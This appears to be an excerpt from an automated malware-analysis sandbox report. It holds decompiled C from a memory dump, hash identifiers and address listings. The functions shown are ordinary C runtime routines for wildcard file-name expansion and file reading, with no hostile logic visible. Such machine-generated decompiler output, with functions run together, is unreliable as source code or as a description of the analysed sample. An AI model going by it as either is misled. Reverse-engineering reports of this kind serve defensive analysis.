                                                  					_push(__ebx);
                                                  					_t323 = 0;
                                                  					_push(__edi);
                                                  					 *_t186 = 0;
                                                  					_t423 = 0;
                                                  					_t341 = 0;
                                                  					_v44 = 0;
                                                  					_v344.cAlternateFileName = 0;
                                                  					_v36 = 0;
                                                  					if( *_t438 == 0) {
                                                  						L9:
                                                  						_v12 = _t323;
                                                  						_t188 = _t341 - _t423;
                                                  						_v8 = _t423;
                                                  						_t405 = (_t188 >> 2) + 1;
                                                  						_v16 = (_t188 >> 2) + 1;
                                                  						asm("sbb esi, esi");
                                                  						_t440 =  !_t438 & _t188 + 0x00000003 >> 0x00000002;
                                                  						if(_t440 != 0) {
                                                  							_t311 = _t423;
                                                  							_t421 = _t323;
                                                  							do {
                                                  								_t400 =  *_t311;
                                                  								_t17 = _t400 + 1; // 0x1
                                                  								_v20 = _t17;
                                                  								do {
                                                  									_t313 =  *_t400;
                                                  									_t400 = _t400 + 1;
                                                  								} while (_t313 != 0);
                                                  								_v12 = _v12 + 1 + _t400 - _v20;
                                                  								_t311 = _v8 + 4;
                                                  								_t421 = _t421 + 1;
                                                  								_v8 = _t311;
                                                  							} while (_t421 != _t440);
                                                  							_t405 = _v16;
                                                  						}
                                                  						_t441 = E00AF2005(_t405, _v12, 1);
                                                  						_t466 = _t465 + 0xc;
                                                  						if(_t441 != 0) {
                                                  							_v8 = _t423;
                                                  							_t193 = _t441 + _v16 * 4;
                                                  							_t342 = _t193;
                                                  							_v28 = _t193;
                                                  							_t194 = _t423;
                                                  							_v16 = _t193;
                                                  							if(_t423 == _v344.cAlternateFileName) {
                                                  								L24:
                                                  								_v12 = _t323;
                                                  								 *_a8 = _t441;
                                                  								_t442 = _t323;
                                                  								goto L25;
                                                  							} else {
                                                  								_v32 = _t441 - _t423;
                                                  								do {
                                                  									_t204 =  *_t194;
                                                  									_t408 = _t204;
                                                  									_v24 = _t204;
                                                  									_v20 = _t408 + 1;
                                                  									do {
                                                  										_t206 =  *_t408;
                                                  										_t408 = _t408 + 1;
                                                  									} while (_t206 != 0);
                                                  									_t207 = _t408 - _v20 + 1;
                                                  									_push(_t207);
                                                  									_v20 = _t207;
                                                  									_t211 = E00B0F425(_t342, _t342, _v28 - _t342 + _v12, _v24);
                                                  									_t466 = _t466 + 0x10;
                                                  									if(_t211 != 0) {
                                                  										_push(_t323);
                                                  										_push(_t323);
                                                  										_push(_t323);
                                                  										_push(_t323);
                                                  										_push(_t323);
                                                  										E00AF68E9();
                                                  										asm("int3");
                                                  										_t460 = _t466;
                                                  										_t467 = _t466 - 0x34;
                                                  										_t213 =  *0xb26018; // 0xb47fd95f
                                                  										_v84 = _t213 ^ _t460;
                                                  										_t215 = _v68;
                                                  										_v112 = _t215;
                                                  										_push(_t441);
                                                  										_t445 = _v72;
                                                  										if(_t215 != 0) {
                                                  											_push(_t323);
                                                  											_push(_t423);
                                                  											_t426 = 0;
                                                  											 *_t215 = 0;
                                                  											_t325 = 0;
                                                  											_t348 = 0;
                                                  											_v52 = 0;
                                                  											_v48 = 0;
                                                  											_v44 = 0;
                                                  											if( *_t445 == 0) {
                                                  												L42:
                                                  												_v24 = _t426;
                                                  												_t217 = _t348 - _t325;
                                                  												_v28 = _t325;
                                                  												_t412 = (_t217 >> 2) + 1;
                                                  												_v32 = (_t217 >> 2) + 1;
                                                  												asm("sbb esi, esi");
                                                  												_t447 =  !_t445 & _t217 + 0x00000003 >> 0x00000002;
                                                  												if(_t447 != 0) {
                                                  													_t295 = _t325;
                                                  													_t419 = _t426;
                                                  													do {
                                                  														_t395 =  *_t295;
                                                  														_t83 = _t395 + 2; // 0x2
                                                  														_v36 = _t83;
                                                  														do {
                                                  															_t297 =  *_t395;
                                                  															_t395 = _t395 + 2;
                                                  														} while (_t297 != _t426);
                                                  														_v24 = _v24 + 1 + (_t395 - _v36 >> 1);
                                                  														_t295 = _v28 + 4;
                                                  														_t419 = _t419 + 1;
                                                  														_v28 = _t295;
                                                  													} while (_t419 != _t447);
                                                  													_t412 = _v32;
                                                  												}
                                                  												_t448 = E00AF2005(_t412, _v24, 2);
                                                  												_t468 = _t467 + 0xc;
                                                  												if(_t448 != 0) {
                                                  													_v28 = _t325;
                                                  													_t222 = _t448 + _v32 * 4;
                                                  													_t413 = _t222;
                                                  													_v60 = _t222;
                                                  													_t223 = _t325;
                                                  													_v32 = _t413;
                                                  													if(_t325 == _v48) {
                                                  														L57:
                                                  														_v24 = _t426;
                                                  														 *(_v344.cAlternateFileName) = _t448;
                                                  														_t449 = _t426;
                                                  														goto L58;
                                                  													} else {
                                                  														_v20 = _t448 - _t325;
                                                  														do {
                                                  															_t234 =  *_t223;
                                                  															_t358 = _t234;
                                                  															_v56 = _t234;
                                                  															_v36 = _t358 + 2;
                                                  															do {
                                                  																_t236 =  *_t358;
                                                  																_t358 = _t358 + 2;
                                                  															} while (_t236 != _t426);
                                                  															_t237 = (_t358 - _v36 >> 1) + 1;
                                                  															_push(_t237);
                                                  															_v36 = _t237;
                                                  															_t363 = _t413 - _v60 >> 1;
                                                  															_t240 = E00B0132B(_t363, _t413, _v24 - _t363, _v56);
                                                  															_t468 = _t468 + 0x10;
                                                  															if(_t240 != 0) {
                                                  																_push(_t426);
                                                  																_push(_t426);
                                                  																_push(_t426);
                                                  																_push(_t426);
                                                  																_push(_t426);
                                                  																E00AF68E9();
                                                  																asm("int3");
                                                  																_push(_t460);
                                                  																_t461 = _t468;
                                                  																_push(_t363);
                                                  																_t364 = _v160;
                                                  																_t134 = _t364 + 1; // 0x1
                                                  																_t414 = _t134;
                                                  																do {
                                                  																	_t242 =  *_t364;
                                                  																	_t364 = _t364 + 1;
                                                  																} while (_t242 != 0);
                                                  																_push(_t426);
                                                  																_t428 = _a4;
                                                  																_t366 = _t364 - _t414 + 1;
                                                  																_v16 = _t366;
                                                  																if(_t366 <=  !_t428) {
                                                  																	_push(_t325);
                                                  																	_t137 = _t428 + 1; // 0x1
                                                  																	_t329 = _t137 + _t366;
                                                  																	_t452 = E00AF4F03(_t366, _t329, 1);
                                                  																	_t368 = _t448;
                                                  																	if(_t428 == 0) {
                                                  																		L72:
                                                  																		_push(_v16);
                                                  																		_t329 = _t329 - _t428;
                                                  																		_t247 = E00B0F425(_t368, _t452 + _t428, _t329, _v4);
                                                  																		_t469 = _t468 + 0x10;
                                                  																		if(_t247 != 0) {
                                                  																			goto L78;
                                                  																		} else {
                                                  																			_t339 = _a8;
                                                  																			_t288 = L00B01F26(_t339, _t414);
                                                  																			_v16 = _t288;
                                                  																			if(_t288 == 0) {
                                                  																				 *(_t339[1]) = _t452;
                                                  																				_t457 = 0;
                                                  																				_t339[1] = _t339[1] + 4;
                                                  																			} else {
                                                  																				L00AF4D62(_t452);
                                                  																				_t457 = _v16;
                                                  																			}
                                                  																			L00AF4D62(0);
                                                  																			_t291 = _t457;
                                                  																			goto L77;
                                                  																		}
                                                  																	} else {
                                                  																		_push(_t428);
                                                  																		_t293 = E00B0F425(_t368, _t452, _t329, _v0);
                                                  																		_t469 = _t468 + 0x10;
                                                  																		if(_t293 != 0) {
                                                  																			L78:
                                                  																			_push(0);
                                                  																			_push(0);
                                                  																			_push(0);
                                                  																			_push(0);
                                                  																			_push(0);
                                                  																			E00AF68E9();
                                                  																			asm("int3");
                                                  																			_push(_t461);
                                                  																			_t462 = _t469;
                                                  																			_push(_t368);
                                                  																			_t369 = _v200;
                                                  																			_push(_t329);
                                                  																			_push(0);
                                                  																			_t149 = _t369 + 2; // 0x2
                                                  																			_t415 = _t149;
                                                  																			do {
                                                  																				_t249 =  *_t369;
                                                  																				_t369 = _t369 + 2;
                                                  																			} while (_t249 != 0);
                                                  																			_t430 = _v0;
                                                  																			_t372 = (_t369 - _t415 >> 1) + 1;
                                                  																			_v20 = _t372;
                                                  																			if(_t372 <=  !_t430) {
                                                  																				_t152 = _t430 + 1; // 0x1
                                                  																				_t332 = _t152 + _t372;
                                                  																				_t453 = E00AF4F03(_t372, _t332, 2);
                                                  																				_t374 = _t452;
                                                  																				if(_t430 == 0) {
                                                  																					L85:
                                                  																					_push(_v20);
                                                  																					_t332 = _t332 - _t430;
                                                  																					_t254 = E00B0132B(_t374, _t453 + _t430 * 2, _t332, _v8);
                                                  																					_t470 = _t469 + 0x10;
                                                  																					if(_t254 != 0) {
                                                  																						goto L91;
                                                  																					} else {
                                                  																						_t433 = _a4;
                                                  																						_t337 = L00B01F26(_t433, _t415);
                                                  																						if(_t337 == 0) {
                                                  																							 *((intOrPtr*)( *((intOrPtr*)(_t433 + 4)))) = _t453;
                                                  																							 *((intOrPtr*)(_t433 + 4)) =  *((intOrPtr*)(_t433 + 4)) + 4;
                                                  																							_t337 = 0;
                                                  																						} else {
                                                  																							L00AF4D62(_t453);
                                                  																						}
                                                  																						L00AF4D62(0);
                                                  																						_t285 = _t337;
                                                  																						goto L90;
                                                  																					}
                                                  																				} else {
                                                  																					_push(_t430);
                                                  																					_t287 = E00B0132B(_t374, _t453, _t332, _v4);
                                                  																					_t470 = _t469 + 0x10;
                                                  																					if(_t287 != 0) {
                                                  																						L91:
                                                  																						_push(0);
                                                  																						_push(0);
                                                  																						_push(0);
                                                  																						_push(0);
                                                  																						_push(0);
                                                  																						E00AF68E9();
                                                  																						asm("int3");
                                                  																						_push(_t462);
                                                  																						_t463 = _t470;
                                                  																						_t471 = _t470 - 0x150;
                                                  																						_t257 =  *0xb26018; // 0xb47fd95f
                                                  																						_v252 = _t257 ^ _t470;
                                                  																						_t375 = _v236;
                                                  																						_push(_t332);
                                                  																						_t333 = _v232;
                                                  																						_push(_t430);
                                                  																						_t431 = _v240;
                                                  																						_v576 = _t333;
                                                  																						while(_t375 != _t431) {
                                                  																							_t259 =  *_t375;
                                                  																							if(_t259 != 0x2f && _t259 != 0x5c && _t259 != 0x3a) {
                                                  																								_t375 = E00B0F470(_t431, _t375);
                                                  																								continue;
                                                  																							}
                                                  																							break;
                                                  																						}
                                                  																						_t416 =  *_t375;
                                                  																						if(_t416 != 0x3a || _t375 ==  &(_t431[1])) {
                                                  																							_t334 = 0;
                                                  																							if(_t416 == 0x2f || _t416 == 0x5c) {
                                                  																								L104:
                                                  																								_t260 = 1;
                                                  																							} else {
                                                  																								_t260 = 0;
                                                  																								if(_t416 == 0x3a) {
                                                  																									goto L104;
                                                  																								}
                                                  																							}
                                                  																							_push(_t453);
                                                  																							asm("sbb eax, eax");
                                                  																							_v352 =  ~(_t260 & 0x000000ff) & _t375 - _t431 + 0x00000001;
                                                  																							E00AD24C0(_t431,  &_v344, _t334, 0x140);
                                                  																							_t472 = _t471 + 0xc;
                                                  																							_t454 = FindFirstFileExA(_t431, _t334,  &_v344, _t334, _t334, _t334);
                                                  																							_t268 = _v348;
                                                  																							if(_t454 != 0xffffffff) {
                                                  																								_v356 =  *((intOrPtr*)(_t268 + 4)) -  *_t268 >> 2;
                                                  																								do {
                                                  																									if(_v344.cFileName != 0x2e) {
                                                  																										L117:
                                                  																										_push(_t268);
                                                  																										_push(_v352);
                                                  																										_t268 =  &(_v344.cFileName);
                                                  																										_push(_t431);
                                                  																										_push(_t268);
                                                  																										L66();
                                                  																										_t472 = _t472 + 0x10;
                                                  																										if(_t268 != 0) {
                                                  																											goto L107;
                                                  																										} else {
                                                  																											goto L118;
                                                  																										}
                                                  																									} else {
                                                  																										_t383 = _v299;
                                                  																										if(_t383 == 0 || _t383 == 0x2e && _v298 == _t334) {
                                                  																											goto L118;
                                                  																										} else {
                                                  																											goto L117;
                                                  																										}
                                                  																									}
                                                  																									goto L111;
                                                  																									L118:
                                                  																									_t273 = FindNextFileA(_t454,  &_v344);
                                                  																									_t268 = _v348;
                                                  																								} while (_t273 != 0);
                                                  																								_t417 =  *_t268;
                                                  																								_t384 = _v356;
                                                  																								_t276 =  *((intOrPtr*)(_t268 + 4)) -  *_t268 >> 2;
                                                  																								if(_v356 !=  *((intOrPtr*)(_t268 + 4)) -  *_t268 >> 2) {
                                                  																									L00B0EF30(_t334, _t431, _t454, _t417 + _t384 * 4, _t276 - _t384, 4, E00B014A8);
                                                  																								}
                                                  																							} else {
                                                  																								_push(_t268);
                                                  																								_push(_t334);
                                                  																								_push(_t334);
                                                  																								_push(_t431);
                                                  																								L66();
                                                  																								L107:
                                                  																								_t334 = _t268;
                                                  																							}
                                                  																							if(_t454 != 0xffffffff) {
                                                  																								FindClose(_t454);
                                                  																							}
                                                  																						} else {
                                                  																							_push(_t333);
                                                  																							_push(0);
                                                  																							_push(0);
                                                  																							_push(_t431);
                                                  																							L66();
                                                  																						}
                                                  																						L111:
                                                  																						return L00AD1DCD(_v24 ^ _t463);
                                                  																					} else {
                                                  																						goto L85;
                                                  																					}
                                                  																				}
                                                  																			} else {
                                                  																				_t285 = 0xc;
                                                  																				L90:
                                                  																				return _t285;
                                                  																			}
                                                  																		} else {
                                                  																			goto L72;
                                                  																		}
                                                  																	}
                                                  																} else {
                                                  																	_t291 = 0xc;
                                                  																	L77:
                                                  																	return _t291;
                                                  																}
                                                  															} else {
                                                  																goto L56;
                                                  															}
                                                  															goto L121;
                                                  															L56:
                                                  															_t294 = _v28;
                                                  															_t418 = _v32;
                                                  															 *((intOrPtr*)(_v20 + _t294)) = _t418;
                                                  															_t223 = _t294 + 4;
                                                  															_v28 = _t223;
                                                  															_t413 = _t418 + _v36 * 2;
                                                  															_v32 = _t413;
                                                  														} while (_t223 != _v48);
                                                  														goto L57;
                                                  													}
                                                  												} else {
                                                  													_t449 = _t448 | 0xffffffff;
                                                  													_v24 = _t448 | 0xffffffff;
                                                  													L58:
                                                  													L00AF4D62(_t426);
                                                  													_pop(_t349);
                                                  													goto L59;
                                                  												}
                                                  											} else {
                                                  												while(1) {
                                                  													_t302 = 0x2a;
                                                  													_v20 = _t302;
                                                  													_t303 = 0x3f;
                                                  													_v18 = _t303;
                                                  													_v16 = 0;
                                                  													_t306 = E00B04ACB( *_t445,  &_v20);
                                                  													_pop(_t349);
                                                  													if(_t306 != 0) {
                                                  														_t349 =  &_v52;
                                                  														_t307 = E00B01BA6(_t325, _t426, _t445,  *_t445, _t306, _t349);
                                                  														_t467 = _t467 + 0xc;
                                                  													} else {
                                                  														_t307 =  &_v52;
                                                  														_push(_t307);
                                                  														_push(_t426);
                                                  														_push(_t426);
                                                  														_push( *_t445);
                                                  														L79();
                                                  														_t467 = _t467 + 0x10;
                                                  													}
                                                  													_v24 = _t307;
                                                  													if(_t307 != 0) {
                                                  														break;
                                                  													}
                                                  													_t445 = _t445 + 4;
                                                  													if( *_t445 != _t426) {
                                                  														continue;
                                                  													} else {
                                                  														_t325 = _v52;
                                                  														_t348 = _v48;
                                                  														goto L42;
                                                  													}
                                                  													goto L121;
                                                  												}
                                                  												_t325 = _v52;
                                                  												_t449 = _v24;
                                                  												L59:
                                                  												_v20 = _t325;
                                                  												asm("sbb ecx, ecx");
                                                  												_t351 =  !_t349 & _v48 - _t325 + 0x00000003 >> 0x00000002;
                                                  												_v344.cAlternateFileName = _t351;
                                                  												if(_t351 != 0) {
                                                  													_t451 = _v20;
                                                  													_t327 = _t351;
                                                  													do {
                                                  														L00AF4D62( *_t451);
                                                  														_t426 = _t426 + 1;
                                                  														_t451 = _t451 + 4;
                                                  													} while (_t426 != _t327);
                                                  													_t325 = _v52;
                                                  													_t449 = _v24;
                                                  												}
                                                  												L00AF4D62(_t325);
                                                  												goto L64;
                                                  											}
                                                  										} else {
                                                  											_t308 = E00AF69E3();
                                                  											_t449 = 0x16;
                                                  											 *_t308 = _t449;
                                                  											E00AF68BC();
                                                  											L64:
                                                  											return L00AD1DCD(_v12 ^ _t460);
                                                  										}
                                                  									} else {
                                                  										goto L23;
                                                  									}
                                                  									goto L121;
                                                  									L23:
                                                  									_t310 = _v8;
                                                  									_t399 = _v16;
                                                  									 *((intOrPtr*)(_v32 + _t310)) = _t399;
                                                  									_t194 = _t310 + 4;
                                                  									_t342 = _t399 + _v20;
                                                  									_v16 = _t399 + _v20;
                                                  									_v8 = _t194;
                                                  								} while (_t194 != _v344.cAlternateFileName);
                                                  								goto L24;
                                                  							}
                                                  						} else {
                                                  							_t442 = _t441 | 0xffffffff;
                                                  							_v12 = _t442;
                                                  							L25:
                                                  							L00AF4D62(_t323);
                                                  							_pop(_t343);
                                                  							goto L26;
                                                  						}
                                                  					} else {
                                                  						while(1) {
                                                  							_v8 = 0x3f2a;
                                                  							_v6 = _t323;
                                                  							_t319 = E00B0F430( *_t438,  &_v8);
                                                  							_pop(_t343);
                                                  							if(_t319 != 0) {
                                                  								_t343 =  &_v44;
                                                  								_push(_t343);
                                                  								_push(_t319);
                                                  								_push( *_t438);
                                                  								L92();
                                                  								_t465 = _t465 + 0xc;
                                                  							} else {
                                                  								_t319 =  &_v44;
                                                  								_push(_t319);
                                                  								_push(_t323);
                                                  								_push(_t323);
                                                  								_push( *_t438);
                                                  								L66();
                                                  								_t465 = _t465 + 0x10;
                                                  							}
                                                  							_v12 = _t319;
                                                  							if(_t319 != 0) {
                                                  								break;
                                                  							}
                                                  							_t438 = _t438 + 4;
                                                  							if( *_t438 != _t323) {
                                                  								continue;
                                                  							} else {
                                                  								_t423 = _v44;
                                                  								_t341 = _v344.cAlternateFileName;
                                                  								goto L9;
                                                  							}
                                                  							goto L121;
                                                  						}
                                                  						_t423 = _v44;
                                                  						_t442 = _v12;
                                                  						L26:
                                                  						_v28 = _t423;
                                                  						asm("sbb ecx, ecx");
                                                  						_t345 =  !_t343 & _v344.cAlternateFileName - _t423 + 0x00000003 >> 0x00000002;
                                                  						_v32 = _t345;
                                                  						if(_t345 != 0) {
                                                  							_t444 = _v28;
                                                  							_t425 = _t345;
                                                  							do {
                                                  								L00AF4D62( *_t444);
                                                  								_t323 = _t323 + 1;
                                                  								_t444 = _t444 + 4;
                                                  							} while (_t323 != _t425);
                                                  							_t423 = _v44;
                                                  							_t442 = _v12;
                                                  						}
                                                  						L00AF4D62(_t423);
                                                  						goto L31;
                                                  					}
                                                  				} else {
                                                  					_t320 = E00AF69E3();
                                                  					_t442 = 0x16;
                                                  					 *_t320 = _t442;
                                                  					E00AF68BC();
                                                  					L31:
                                                  					return _t442;
                                                  				}
                                                  				L121:
                                                  			}

                                                  0x00b014c5
                                                  0x00b014c8
                                                  0x00b014cb
                                                  0x00b014ce
                                                  0x00b014e4
                                                  0x00b014e7
                                                  0x00b014e8
                                                  0x00b014ea
                                                  0x00b014eb
                                                  0x00b014ed
                                                  0x00b014ef
                                                  0x00b014f1
                                                  0x00b014f4
                                                  0x00b014f7
                                                  0x00b014fc
                                                  0x00b0154d
                                                  0x00b0154f
                                                  0x00b01552
                                                  0x00b01554
                                                  0x00b0155f
                                                  0x00b01565
                                                  0x00b01568
                                                  0x00b0156c
                                                  0x00b0156e
                                                  0x00b01570
                                                  0x00b01572
                                                  0x00b01574
                                                  0x00b01574
                                                  0x00b01576
                                                  0x00b01579
                                                  0x00b0157c
                                                  0x00b0157c
                                                  0x00b0157e
                                                  0x00b0157f
                                                  0x00b0158c
                                                  0x00b01592
                                                  0x00b01595
                                                  0x00b01596
                                                  0x00b01599
                                                  0x00b0159d
                                                  0x00b0159d
                                                  0x00b015ab
                                                  0x00b015ad
                                                  0x00b015b2
                                                  0x00b015cd
                                                  0x00b015d0
                                                  0x00b015d3
                                                  [Control-flow graph view: instruction address column only (0x00b014d0 – 0x00b01b9e, with 0x00000000 for unresolved targets); the disassembly text belonging to these addresses is not part of this extracted listing]

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: *?$.
                                                  • API String ID: 269201875-3972193922
                                                  • Opcode ID: 93988119b0a63234c14f9333372ee23a57d2f9fafbdd7d98772c2a9ef9914cf9
                                                  • Instruction ID: de00e4dc71b739b5bb7b8933210c28e0a510cb8b80bcc3ea07e51970856dc37d
                                                  • Opcode Fuzzy Hash: 93988119b0a63234c14f9333372ee23a57d2f9fafbdd7d98772c2a9ef9914cf9
                                                  • Instruction Fuzzy Hash: 67E11975E002199FDF18DFADC8819EEFBF5EF48310B1485AAE955A7340E731AE418B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 77%
                                                  			E00AF74A5(signed int _a4, void* _a8, unsigned int _a12) {
                                                  				signed int _v5;
                                                  				char _v6;
                                                  				void* _v12;
                                                  				unsigned int _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				void* _v32;
                                                  				long _v36;
                                                  				void* _v40;
                                                  				long _v44;
                                                  				signed int* _t139;
                                                  				signed int _t141;
                                                  				intOrPtr _t145;
                                                  				signed int _t149;
                                                  				signed int _t151;
                                                  				signed char _t153;
                                                  				unsigned int _t154;
                                                  				intOrPtr _t158;
                                                  				void* _t159;
                                                  				signed int _t160;
                                                  				signed int _t163;
                                                  				long _t164;
                                                  				intOrPtr _t171;
                                                  				signed int _t172;
                                                  				intOrPtr _t174;
                                                  				signed int _t176;
                                                  				signed int _t180;
                                                  				char _t187;
                                                  				char* _t188;
                                                  				char _t195;
                                                  				char* _t196;
                                                  				signed char _t207;
                                                  				signed int _t209;
                                                  				long _t211;
                                                  				signed int _t212;
                                                  				char _t214;
                                                  				signed char _t218;
                                                  				signed int _t219;
                                                  				unsigned int _t220;
                                                  				intOrPtr _t221;
                                                  				unsigned int _t225;
                                                  				signed int _t227;
                                                  				signed int _t228;
                                                  				signed int _t229;
                                                  				signed int _t230;
                                                  				signed int _t231;
                                                  				signed char _t232;
                                                  				signed int _t233;
                                                  				signed int _t235;
                                                  				signed int _t236;
                                                  				signed int _t237;
                                                  				signed int _t238;
                                                  				signed int _t242;
                                                  				void* _t244;
                                                  				void* _t245;
                                                  
                                                  				_t209 = _a4;
                                                  				if(_t209 != 0xfffffffe) {
                                                  					__eflags = _t209;
                                                  					if(_t209 < 0) {
                                                  						L58:
                                                  						_t139 = E00AF69D0();
                                                  						 *_t139 =  *_t139 & 0x00000000;
                                                  						__eflags =  *_t139;
                                                  						 *((intOrPtr*)(E00AF69E3())) = 9;
                                                  						L59:
                                                  						_t141 = E00AF68BC();
                                                  						goto L60;
                                                  					}
                                                  					__eflags = _t209 -  *0xb27bf0; // 0x40
                                                  					if(__eflags >= 0) {
                                                  						goto L58;
                                                  					}
                                                  					_v24 = 1;
                                                  					_t235 = _t209 >> 6;
                                                  					_t231 = (_t209 & 0x0000003f) * 0x30;
                                                  					_v20 = _t235;
                                                  					_t145 =  *((intOrPtr*)(0xb279f0 + _t235 * 4));
                                                  					_v28 = _t231;
                                                  					_t8 = _t231 + 0x28; // 0xc483fffd
                                                  					_t218 =  *((intOrPtr*)(_t145 + _t8));
                                                  					_v5 = _t218;
                                                  					__eflags = _t218 & 0x00000001;
                                                  					if((_t218 & 0x00000001) == 0) {
                                                  						goto L58;
                                                  					}
                                                  					_t219 = _a12;
                                                  					__eflags = _t219 - 0x7fffffff;
                                                  					if(_t219 <= 0x7fffffff) {
                                                  						__eflags = _t219;
                                                  						if(_t219 == 0) {
                                                  							L57:
                                                  							return 0;
                                                  						}
                                                  						__eflags = _v5 & 0x00000002;
                                                  						if((_v5 & 0x00000002) != 0) {
                                                  							goto L57;
                                                  						}
                                                  						__eflags = _a8;
                                                  						if(_a8 == 0) {
                                                  							goto L6;
                                                  						}
                                                  						_t18 = _t231 + 0x18; // 0xb27ea0
                                                  						_t20 = _t231 + 0x29; // 0x10c483ff
                                                  						_t149 =  *((intOrPtr*)(_t145 + _t20));
                                                  						_v5 = _t149;
                                                  						_v32 =  *((intOrPtr*)(_t145 + _t18));
                                                  						_t242 = 0;
                                                  						_t151 = _t149 - 1;
                                                  						__eflags = _t151;
                                                  						if(_t151 == 0) {
                                                  							_t232 = _v24;
                                                  							_t153 =  !_t219;
                                                  							__eflags = _t232 & _t153;
                                                  							if((_t232 & _t153) != 0) {
                                                  								_t154 = 4;
                                                  								_t220 = _t219 >> 1;
                                                  								_v16 = _t154;
                                                  								__eflags = _t220 - _t154;
                                                  								if(_t220 >= _t154) {
                                                  									_t154 = _t220;
                                                  									_v16 = _t220;
                                                  								}
                                                  								_t242 = L00AF4D9C(_t220, _t154);
                                                  								L00AF4D62(0);
                                                  								L00AF4D62(0);
                                                  								_t245 = _t244 + 0xc;
                                                  								_v12 = _t242;
                                                  								__eflags = _t242;
                                                  								if(_t242 != 0) {
                                                  									_t158 = L00AF6E35(_t209, 0, 0, _v24);
                                                  									_t221 =  *((intOrPtr*)(0xb279f0 + _t235 * 4));
                                                  									_t244 = _t245 + 0x10;
                                                  									_t236 = _v28;
                                                  									 *((intOrPtr*)(_t221 + _t236 + 0x20)) = _t158;
                                                  									_t159 = _t242;
                                                  									 *(_t221 + _t236 + 0x24) = _t232;
                                                  									_t231 = _t236;
                                                  									_t219 = _v16;
                                                  									L21:
                                                  									_t237 = 0;
                                                  									_v40 = _t159;
                                                  									_t211 =  *((intOrPtr*)(0xb279f0 + _v20 * 4));
                                                  									_v36 = _t211;
                                                  									__eflags =  *(_t211 + _t231 + 0x28) & 0x00000048;
                                                  									_t212 = _a4;
                                                  									if(( *(_t211 + _t231 + 0x28) & 0x00000048) != 0) {
                                                  										_t214 =  *((intOrPtr*)(_v36 + _t231 + 0x2a));
                                                  										_v6 = _t214;
                                                  										__eflags = _t214 - 0xa;
                                                  										_t212 = _a4;
                                                  										if(_t214 != 0xa) {
                                                  											__eflags = _t219;
                                                  											if(_t219 != 0) {
                                                  												_t237 = _v24;
                                                  												 *_t159 = _v6;
                                                  												_t212 = _a4;
                                                  												_t228 = _t219 - 1;
                                                  												__eflags = _v5;
                                                  												_v12 = _t159 + 1;
                                                  												_v16 = _t228;
                                                  												 *((char*)( *((intOrPtr*)(0xb279f0 + _v20 * 4)) + _t231 + 0x2a)) = 0xa;
                                                  												if(_v5 != 0) {
                                                  													_t187 =  *((intOrPtr*)( *((intOrPtr*)(0xb279f0 + _v20 * 4)) + _t231 + 0x2b));
                                                  													_v6 = _t187;
                                                  													__eflags = _t187 - 0xa;
                                                  													if(_t187 != 0xa) {
                                                  														__eflags = _t228;
                                                  														if(_t228 != 0) {
                                                  															_t188 = _v12;
                                                  															_t237 = 2;
                                                  															 *_t188 = _v6;
                                                  															_t212 = _a4;
                                                  															_t229 = _t228 - 1;
                                                  															_v12 = _t188 + 1;
                                                  															_v16 = _t229;
                                                  															 *((char*)( *((intOrPtr*)(0xb279f0 + _v20 * 4)) + _t231 + 0x2b)) = 0xa;
                                                  															__eflags = _v5 - _v24;
                                                  															if(_v5 == _v24) {
                                                  																_t195 =  *((intOrPtr*)( *((intOrPtr*)(0xb279f0 + _v20 * 4)) + _t231 + 0x2c));
                                                  																_v6 = _t195;
                                                  																__eflags = _t195 - 0xa;
                                                  																if(_t195 != 0xa) {
                                                  																	__eflags = _t229;
                                                  																	if(_t229 != 0) {
                                                  																		_t196 = _v12;
                                                  																		_t237 = 3;
                                                  																		 *_t196 = _v6;
                                                  																		_t212 = _a4;
                                                  																		_t230 = _t229 - 1;
                                                  																		__eflags = _t230;
                                                  																		_v12 = _t196 + 1;
                                                  																		_v16 = _t230;
                                                  																		 *((char*)( *((intOrPtr*)(0xb279f0 + _v20 * 4)) + _t231 + 0x2c)) = 0xa;
                                                  																	}
                                                  																}
                                                  															}
                                                  														}
                                                  													}
                                                  												}
                                                  											}
                                                  										}
                                                  									}
                                                  									_t160 = L00B07F16(_t212);
                                                  									__eflags = _t160;
                                                  									if(_t160 == 0) {
                                                  										L41:
                                                  										_v24 = 0;
                                                  										L42:
                                                  										_t163 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
                                                  										__eflags = _t163;
                                                  										if(_t163 == 0) {
                                                  											L53:
                                                  											_t164 = GetLastError();
                                                  											_t237 = 5;
                                                  											__eflags = _t164 - _t237;
                                                  											if(_t164 != _t237) {
                                                  												__eflags = _t164 - 0x6d;
                                                  												if(_t164 != 0x6d) {
                                                  													L37:
                                                  													E00AF69AD(_t164);
                                                  													goto L38;
                                                  												}
                                                  												_t238 = 0;
                                                  												goto L39;
                                                  											}
                                                  											 *((intOrPtr*)(E00AF69E3())) = 9;
                                                  											 *(E00AF69D0()) = _t237;
                                                  											goto L38;
                                                  										}
                                                  										_t225 = _a12;
                                                  										__eflags = _v36 - _t225;
                                                  										if(_v36 > _t225) {
                                                  											goto L53;
                                                  										}
                                                  										_t238 = _t237 + _v36;
                                                  										__eflags = _t238;
                                                  										L45:
                                                  										_t233 = _v28;
                                                  										_t171 =  *((intOrPtr*)(0xb279f0 + _v20 * 4));
                                                  										__eflags =  *((char*)(_t171 + _t233 + 0x28));
                                                  										if( *((char*)(_t171 + _t233 + 0x28)) < 0) {
                                                  											__eflags = _v5 - 2;
                                                  											if(_v5 == 2) {
                                                  												__eflags = _v24;
                                                  												_push(_t238 >> 1);
                                                  												_push(_v40);
                                                  												_push(_t212);
                                                  												if(_v24 == 0) {
                                                  													_t172 = L00AF6FC2();
                                                  												} else {
                                                  													_t172 = E00AF7325();
                                                  												}
                                                  											} else {
                                                  												_t226 = _t225 >> 1;
                                                  												__eflags = _t225 >> 1;
                                                  												_t172 = E00AF71CE(_t225 >> 1, _t225 >> 1, _t212, _v12, _t238, _a8, _t226);
                                                  											}
                                                  											_t238 = _t172;
                                                  										}
